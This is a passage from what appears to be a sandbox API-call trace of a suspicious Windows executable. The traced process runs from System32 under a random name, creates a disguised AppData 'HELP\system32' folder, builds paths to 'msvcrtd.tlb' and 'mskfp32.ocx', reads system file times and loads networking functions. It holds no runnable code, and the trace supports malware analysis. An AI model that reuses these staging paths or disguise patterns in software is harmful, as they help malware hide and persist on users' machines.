¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā") returned 256 [0031.351] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0031.351] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x24ea38, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0031.351] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x24f0f4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿbÐòõ,ô$", lpUsedDefaultChar=0x0) returned 256 [0031.351] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.351] GetLastError () returned 0x0 [0031.351] SetLastError (dwErrCode=0x0) [0031.351] GetLastError () returned 0x0 [0031.351] SetLastError (dwErrCode=0x0) [0031.351] GetLastError () returned 0x0 [0031.351] SetLastError (dwErrCode=0x0) [0031.351] GetLastError () returned 0x0 [0031.351] SetLastError (dwErrCode=0x0) [0031.351] GetLastError () returned 0x0 [0031.351] SetLastError (dwErrCode=0x0) [0031.351] GetLastError () returned 0x0 [0031.351] SetLastError (dwErrCode=0x0) [0031.351] GetLastError () returned 0x0 [0031.351] SetLastError (dwErrCode=0x0) [0031.351] GetLastError () returned 0x0 [0031.352] SetLastError (dwErrCode=0x0) [0031.352] GetLastError () returned 0x0 [0031.352] SetLastError (dwErrCode=0x0) [0031.352] GetLastError () returned 0x0 [0031.352] SetLastError (dwErrCode=0x0) [0031.352] GetLastError () returned 0x0 [0031.352] SetLastError (dwErrCode=0x0) [0031.352] GetLastError () returned 0x0 [0031.352] SetLastError (dwErrCode=0x0) [0031.352] GetLastError () returned 0x0 [0031.352] SetLastError (dwErrCode=0x0) [0031.352] GetLastError () returned 0x0 [0031.352] SetLastError (dwErrCode=0x0) [0031.352] GetLastError () returned 0x0 [0031.352] SetLastError (dwErrCode=0x0) [0031.352] GetLastError () returned 0x0 [0031.352] SetLastError (dwErrCode=0x0) [0031.352] GetLastError () returned 0x0 [0031.352] SetLastError (dwErrCode=0x0) [0031.352] GetLastError () returned 0x0 [0031.352] SetLastError (dwErrCode=0x0) [0031.352] GetLastError () returned 0x0 [0031.352] SetLastError (dwErrCode=0x0) [0031.352] GetLastError () returned 0x0 [0031.352] SetLastError (dwErrCode=0x0) [0031.352] GetLastError () returned 0x0 [0031.353] SetLastError (dwErrCode=0x0) [0031.353] GetLastError () returned 0x0 [0031.353] SetLastError (dwErrCode=0x0) [0031.353] GetLastError () returned 0x0 [0031.353] SetLastError (dwErrCode=0x0) [0031.353] GetLastError () returned 0x0 [0031.353] SetLastError (dwErrCode=0x0) [0031.353] GetLastError () returned 0x0 [0031.353] SetLastError (dwErrCode=0x0) [0031.353] GetLastError () returned 0x0 [0031.353] SetLastError (dwErrCode=0x0) [0031.353] GetLastError () returned 0x0 [0031.353] SetLastError (dwErrCode=0x0) [0031.353] GetLastError () returned 0x0 [0031.353] SetLastError (dwErrCode=0x0) [0031.353] GetLastError () returned 0x0 [0031.353] SetLastError (dwErrCode=0x0) [0031.353] GetLastError () returned 0x0 [0031.353] SetLastError (dwErrCode=0x0) [0031.353] GetLastError () returned 0x0 [0031.353] SetLastError (dwErrCode=0x0) [0031.353] GetLastError () returned 0x0 [0031.353] SetLastError (dwErrCode=0x0) [0031.353] GetLastError () returned 0x0 [0031.353] SetLastError (dwErrCode=0x0) [0031.353] GetLastError () returned 0x0 [0031.354] SetLastError (dwErrCode=0x0) [0031.354] GetLastError () returned 0x0 [0031.354] SetLastError (dwErrCode=0x0) [0031.354] GetLastError () returned 0x0 [0031.354] SetLastError (dwErrCode=0x0) [0031.354] GetLastError () returned 0x0 [0031.354] SetLastError (dwErrCode=0x0) [0031.354] GetLastError () returned 0x0 [0031.354] SetLastError (dwErrCode=0x0) [0031.354] GetLastError () returned 0x0 [0031.354] SetLastError (dwErrCode=0x0) [0031.354] GetLastError () returned 0x0 [0031.354] SetLastError (dwErrCode=0x0) [0031.354] GetLastError () returned 0x0 [0031.354] SetLastError (dwErrCode=0x0) [0031.354] GetLastError () returned 0x0 [0031.354] SetLastError (dwErrCode=0x0) [0031.354] GetLastError () returned 0x0 [0031.354] SetLastError (dwErrCode=0x0) [0031.354] GetLastError () returned 0x0 [0031.354] SetLastError (dwErrCode=0x0) [0031.354] GetLastError () returned 0x0 [0031.354] SetLastError (dwErrCode=0x0) [0031.354] GetLastError () returned 0x0 [0031.355] SetLastError (dwErrCode=0x0) [0031.355] GetLastError () returned 0x0 [0031.355] SetLastError (dwErrCode=0x0) [0031.355] GetLastError () returned 0x0 [0031.355] SetLastError (dwErrCode=0x0) [0031.355] GetLastError () returned 0x0 [0031.355] SetLastError (dwErrCode=0x0) [0031.355] GetLastError () returned 0x0 [0031.355] SetLastError (dwErrCode=0x0) [0031.355] GetLastError () returned 0x0 [0031.355] SetLastError (dwErrCode=0x0) [0031.355] GetLastError () returned 0x0 [0031.355] SetLastError (dwErrCode=0x0) [0031.355] GetLastError () returned 0x0 [0031.355] SetLastError (dwErrCode=0x0) [0031.355] GetLastError () returned 0x0 [0031.355] SetLastError (dwErrCode=0x0) [0031.355] GetLastError () returned 0x0 [0031.355] SetLastError (dwErrCode=0x0) [0031.355] GetLastError () returned 0x0 [0031.356] SetLastError (dwErrCode=0x0) [0031.356] GetLastError () returned 0x0 [0031.356] SetLastError (dwErrCode=0x0) [0031.356] GetLastError () returned 0x0 [0031.356] SetLastError (dwErrCode=0x0) [0031.356] GetLastError () returned 0x0 [0031.356] SetLastError (dwErrCode=0x0) [0031.356] GetLastError () returned 0x0 [0031.356] SetLastError (dwErrCode=0x0) [0031.356] GetLastError () returned 0x0 [0031.356] SetLastError (dwErrCode=0x0) [0031.356] GetLastError () returned 0x0 [0031.356] SetLastError (dwErrCode=0x0) [0031.356] GetLastError () returned 0x0 [0031.356] SetLastError (dwErrCode=0x0) [0031.356] GetLastError () returned 0x0 [0031.356] SetLastError (dwErrCode=0x0) [0031.356] GetLastError () returned 0x0 [0031.356] SetLastError (dwErrCode=0x0) [0031.356] GetLastError () returned 0x0 [0031.356] SetLastError (dwErrCode=0x0) [0031.356] GetLastError () returned 0x0 [0031.356] SetLastError (dwErrCode=0x0) [0031.356] GetLastError () returned 0x0 [0031.356] SetLastError (dwErrCode=0x0) [0031.356] GetLastError () returned 0x0 [0031.357] SetLastError (dwErrCode=0x0) [0031.357] GetLastError () returned 0x0 [0031.357] SetLastError (dwErrCode=0x0) [0031.357] GetLastError () returned 0x0 [0031.357] SetLastError (dwErrCode=0x0) [0031.357] GetLastError () returned 0x0 [0031.357] SetLastError (dwErrCode=0x0) [0031.357] GetLastError () returned 0x0 [0031.357] SetLastError (dwErrCode=0x0) [0031.357] GetLastError () returned 0x0 [0031.357] SetLastError (dwErrCode=0x0) [0031.357] GetLastError () returned 0x0 [0031.357] SetLastError (dwErrCode=0x0) [0031.357] GetLastError () returned 0x0 [0031.357] SetLastError (dwErrCode=0x0) [0031.357] GetLastError () returned 0x0 [0031.357] SetLastError (dwErrCode=0x0) [0031.357] GetLastError () returned 0x0 [0031.357] SetLastError (dwErrCode=0x0) [0031.357] GetLastError () returned 0x0 [0031.357] SetLastError (dwErrCode=0x0) [0031.357] GetLastError () returned 0x0 [0031.357] SetLastError (dwErrCode=0x0) [0031.357] GetLastError () returned 0x0 [0031.357] SetLastError (dwErrCode=0x0) [0031.358] GetLastError () returned 0x0 [0031.358] SetLastError (dwErrCode=0x0) [0031.358] GetLastError () returned 0x0 [0031.358] SetLastError (dwErrCode=0x0) [0031.358] GetLastError () returned 0x0 [0031.358] SetLastError (dwErrCode=0x0) [0031.358] GetLastError () returned 0x0 [0031.358] SetLastError (dwErrCode=0x0) [0031.358] GetLastError () returned 0x0 [0031.358] SetLastError (dwErrCode=0x0) [0031.358] GetLastError () returned 0x0 [0031.358] SetLastError (dwErrCode=0x0) [0031.358] GetLastError () returned 0x0 [0031.358] SetLastError (dwErrCode=0x0) [0031.358] GetLastError () returned 0x0 [0031.358] SetLastError (dwErrCode=0x0) [0031.358] GetLastError () returned 0x0 [0031.358] SetLastError (dwErrCode=0x0) [0031.358] GetLastError () returned 0x0 [0031.358] SetLastError (dwErrCode=0x0) [0031.358] GetLastError () returned 0x0 [0031.358] SetLastError (dwErrCode=0x0) [0031.358] GetLastError () returned 0x0 [0031.358] SetLastError (dwErrCode=0x0) [0031.358] GetLastError () returned 0x0 [0031.359] SetLastError (dwErrCode=0x0) [0031.359] GetLastError () returned 0x0 [0031.359] SetLastError (dwErrCode=0x0) [0031.359] GetLastError () returned 0x0 [0031.359] SetLastError (dwErrCode=0x0) [0031.359] GetLastError () returned 0x0 [0031.359] SetLastError (dwErrCode=0x0) [0031.359] GetLastError () returned 0x0 [0031.359] SetLastError (dwErrCode=0x0) [0031.359] GetLastError () returned 0x0 [0031.359] SetLastError (dwErrCode=0x0) [0031.359] GetLastError () returned 0x0 [0031.359] SetLastError (dwErrCode=0x0) [0031.359] GetLastError () returned 0x0 [0031.359] SetLastError (dwErrCode=0x0) [0031.359] GetLastError () returned 0x0 [0031.359] SetLastError (dwErrCode=0x0) [0031.359] GetLastError () returned 0x0 [0031.359] SetLastError (dwErrCode=0x0) [0031.359] GetLastError () returned 0x0 [0031.359] SetLastError (dwErrCode=0x0) [0031.359] GetLastError () returned 0x0 [0031.359] SetLastError (dwErrCode=0x0) [0031.359] GetLastError () returned 0x0 [0031.359] SetLastError (dwErrCode=0x0) [0031.359] GetLastError () returned 0x0 [0031.360] SetLastError (dwErrCode=0x0) [0031.360] GetLastError () returned 0x0 [0031.360] SetLastError (dwErrCode=0x0) [0031.360] GetLastError () returned 0x0 [0031.360] SetLastError (dwErrCode=0x0) [0031.360] GetLastError () returned 0x0 [0031.360] SetLastError (dwErrCode=0x0) [0031.360] GetLastError () returned 0x0 [0031.360] SetLastError (dwErrCode=0x0) [0031.360] GetLastError () returned 0x0 [0031.360] SetLastError (dwErrCode=0x0) [0031.360] GetLastError () returned 0x0 [0031.360] SetLastError (dwErrCode=0x0) [0031.360] GetLastError () returned 0x0 [0031.360] SetLastError (dwErrCode=0x0) [0031.360] GetLastError () returned 0x0 [0031.360] SetLastError (dwErrCode=0x0) [0031.360] GetLastError () returned 0x0 [0031.360] SetLastError (dwErrCode=0x0) [0031.360] GetLastError () returned 0x0 [0031.360] SetLastError (dwErrCode=0x0) [0031.360] GetLastError () returned 0x0 [0031.360] SetLastError (dwErrCode=0x0) [0031.360] GetLastError () returned 0x0 [0031.360] SetLastError (dwErrCode=0x0) [0031.361] GetLastError () returned 0x0 [0031.361] SetLastError (dwErrCode=0x0) [0031.361] GetLastError () returned 0x0 [0031.361] SetLastError (dwErrCode=0x0) [0031.361] GetLastError () returned 0x0 [0031.361] SetLastError (dwErrCode=0x0) [0031.361] GetLastError () returned 0x0 [0031.361] SetLastError (dwErrCode=0x0) [0031.361] GetLastError () returned 0x0 [0031.361] SetLastError (dwErrCode=0x0) [0031.361] GetLastError () returned 0x0 [0031.361] SetLastError (dwErrCode=0x0) [0031.361] GetLastError () returned 0x0 [0031.361] SetLastError (dwErrCode=0x0) [0031.361] GetLastError () returned 0x0 [0031.361] SetLastError (dwErrCode=0x0) [0031.361] GetLastError () returned 0x0 [0031.361] SetLastError (dwErrCode=0x0) [0031.361] GetLastError () returned 0x0 [0031.361] SetLastError (dwErrCode=0x0) [0031.361] GetLastError () returned 0x0 [0031.361] SetLastError (dwErrCode=0x0) [0031.361] GetLastError () returned 0x0 [0031.361] SetLastError (dwErrCode=0x0) [0031.361] GetLastError () returned 0x0 [0031.362] SetLastError (dwErrCode=0x0) [0031.362] GetLastError () returned 0x0 [0031.362] SetLastError (dwErrCode=0x0) [0031.362] GetLastError () returned 0x0 [0031.362] SetLastError (dwErrCode=0x0) [0031.362] GetLastError () returned 0x0 [0031.362] SetLastError (dwErrCode=0x0) [0031.362] GetLastError () returned 0x0 [0031.362] SetLastError (dwErrCode=0x0) [0031.362] GetLastError () returned 0x0 [0031.362] SetLastError (dwErrCode=0x0) [0031.362] GetLastError () returned 0x0 [0031.362] SetLastError (dwErrCode=0x0) [0031.362] GetLastError () returned 0x0 [0031.362] SetLastError (dwErrCode=0x0) [0031.362] GetLastError () returned 0x0 [0031.362] SetLastError (dwErrCode=0x0) [0031.362] GetLastError () returned 0x0 [0031.362] SetLastError (dwErrCode=0x0) [0031.362] GetLastError () returned 0x0 [0031.362] SetLastError (dwErrCode=0x0) [0031.362] GetLastError () returned 0x0 [0031.362] SetLastError (dwErrCode=0x0) [0031.362] GetLastError () returned 0x0 [0031.362] SetLastError (dwErrCode=0x0) [0031.362] GetLastError () returned 0x0 [0031.363] SetLastError (dwErrCode=0x0) [0031.363] GetLastError () returned 0x0 [0031.363] SetLastError (dwErrCode=0x0) [0031.363] GetLastError () returned 0x0 [0031.363] SetLastError (dwErrCode=0x0) [0031.363] GetLastError () returned 0x0 [0031.363] SetLastError (dwErrCode=0x0) [0031.363] GetLastError () returned 0x0 [0031.363] SetLastError (dwErrCode=0x0) [0031.363] GetLastError () returned 0x0 [0031.363] SetLastError (dwErrCode=0x0) [0031.363] GetLastError () returned 0x0 [0031.363] SetLastError (dwErrCode=0x0) [0031.363] GetLastError () returned 0x0 [0031.363] SetLastError (dwErrCode=0x0) [0031.363] GetLastError () returned 0x0 [0031.363] SetLastError (dwErrCode=0x0) [0031.363] GetLastError () returned 0x0 [0031.363] SetLastError (dwErrCode=0x0) [0031.363] GetLastError () returned 0x0 [0031.363] SetLastError (dwErrCode=0x0) [0031.363] GetLastError () returned 0x0 [0031.363] SetLastError (dwErrCode=0x0) [0031.363] GetLastError () returned 0x0 [0031.363] SetLastError (dwErrCode=0x0) [0031.364] GetLastError () returned 0x0 [0031.364] SetLastError (dwErrCode=0x0) [0031.364] GetLastError () returned 0x0 [0031.364] SetLastError (dwErrCode=0x0) [0031.364] GetLastError () returned 0x0 [0031.364] SetLastError (dwErrCode=0x0) [0031.364] GetLastError () returned 0x0 [0031.364] SetLastError (dwErrCode=0x0) [0031.364] GetLastError () returned 0x0 [0031.364] SetLastError (dwErrCode=0x0) [0031.364] GetLastError () returned 0x0 [0031.364] SetLastError (dwErrCode=0x0) [0031.364] GetLastError () returned 0x0 [0031.364] SetLastError (dwErrCode=0x0) [0031.364] GetLastError () returned 0x0 [0031.364] SetLastError (dwErrCode=0x0) [0031.364] GetLastError () returned 0x0 [0031.364] SetLastError (dwErrCode=0x0) [0031.364] GetLastError () returned 0x0 [0031.364] SetLastError (dwErrCode=0x0) [0031.364] GetLastError () returned 0x0 [0031.364] SetLastError (dwErrCode=0x0) [0031.364] GetLastError () returned 0x0 [0031.364] SetLastError (dwErrCode=0x0) [0031.364] GetLastError () returned 0x0 [0031.365] SetLastError (dwErrCode=0x0) [0031.365] GetLastError () returned 0x0 [0031.365] SetLastError (dwErrCode=0x0) [0031.365] GetLastError () returned 0x0 [0031.365] SetLastError (dwErrCode=0x0) [0031.365] GetLastError () returned 0x0 [0031.365] SetLastError (dwErrCode=0x0) [0031.365] GetLastError () returned 0x0 [0031.365] SetLastError (dwErrCode=0x0) [0031.365] GetLastError () returned 0x0 [0031.365] SetLastError (dwErrCode=0x0) [0031.365] GetLastError () returned 0x0 [0031.365] SetLastError (dwErrCode=0x0) [0031.366] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0031.366] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0031.366] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0031.367] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f470 | out: lpSystemTimeAsFileTime=0x24f470*(dwLowDateTime=0xe06a99b0, dwHighDateTime=0x1d3dfba)) [0031.368] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24f3a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.368] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24f290, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.368] GetLastError () returned 0x0 [0031.368] GetLastError () returned 0x0 [0031.368] GetLastError () returned 0x0 [0031.368] GetLastError () returned 0x0 [0031.368] GetLastError () returned 0x0 [0031.368] GetLastError () returned 0x0 [0031.368] GetLastError () returned 0x0 [0031.368] GetLastError () returned 0x0 [0031.368] GetLastError () returned 0x0 [0031.368] GetLastError () returned 0x0 [0031.368] GetLastError () returned 0x0 [0031.368] GetLastError () returned 0x0 [0031.368] GetLastError () returned 0x0 [0031.368] GetLastError () returned 0x0 [0031.368] GetLastError () returned 0x0 [0031.368] GetLastError () returned 0x0 [0031.368] GetLastError () returned 0x0 [0031.368] GetLastError () returned 0x0 [0031.368] GetLastError () returned 0x0 [0031.368] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0031.369] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0031.369] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.369] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.369] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.369] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0031.369] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0031.369] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0031.369] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0031.369] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0031.369] GetLastError () returned 0xb7 [0031.369] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0031.369] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0031.369] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0031.369] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0031.369] wsprintfA (in: param_1=0x24f110, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0031.369] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0031.370] wsprintfA (in: param_1=0x24f00c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0031.370] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0031.370] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0031.370] CloseHandle (hObject=0x74) returned 1 [0031.370] GetLastError () returned 0x0 [0031.370] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0031.370] GetLastError () returned 0x0 [0031.370] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0031.370] GetSystemDirectoryA (in: lpBuffer=0x24f110, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0031.370] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0031.371] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0031.371] CloseHandle (hObject=0x74) returned 1 [0031.371] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0031.371] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0031.371] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0031.373] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0031.373] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0031.373] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0031.373] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0031.373] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0031.373] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0031.373] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 